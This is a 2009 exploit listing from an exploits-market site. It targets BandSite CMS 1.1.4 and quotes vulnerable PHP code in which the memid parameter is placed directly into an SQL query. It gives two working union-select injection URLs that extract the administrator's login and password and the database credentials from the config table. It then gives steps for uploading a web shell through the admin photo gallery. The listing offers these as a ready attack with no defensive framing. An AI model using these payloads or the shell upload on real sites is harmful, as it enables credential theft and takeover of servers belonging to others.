[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BandSite CMS 1.1.4 (members.php memid) SQL Injection Vulnerability

Author
SirGod
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4973
Category
web applications
Date add
29-03-2009
Platform
unsorted
==================================================================
BandSite CMS 1.1.4 (members.php memid) SQL Injection Vulnerability
==================================================================


#########################################################################

[+] Remote SQL Injection

 - The script is full of SQLI bugs.This is one of them.

 - Vulnerable code in includes\content\member_content.php

-----------------------------------------------------------------------------------------------------------------------------------
	$memid = $_REQUEST['memid'];
	
	// define the query
	// if the $memid variable is set, that means we're displaying a full bio and we should select the specific member entry
	if(isset($memid)){
		$query = "
			SELECT
				*
			FROM
				memberbios
			WHERE
				rec_id=$memid";
	}
-----------------------------------------------------------------------------------------------------------------------------------


  PoC 1 :

    http://127.0.0.1/members.php?memid=1 union all select 1,2,concat_ws(0x3a,admin_username,admin_password,admin_email),4,5,6,7 from config--

  PoC 2 :

    http://127.0.0.1/members.php?memid=1 union all select 1,2,concat_ws(0x3a,db_username,db_password,db_name,db_host),4,5,6,7 from config--


[+] Upload Shell

 - Need to be logged in as administrator.

 Go to :

    http://127.0.0.1/adminpanel/index.php?action=addphotos

 Add the shell :

    cmd.php

 You will find your shell here :

    http://127.0.0.1/images/gallery/cmd.php

#########################################################################



#  0day.today [2024-12-25]  #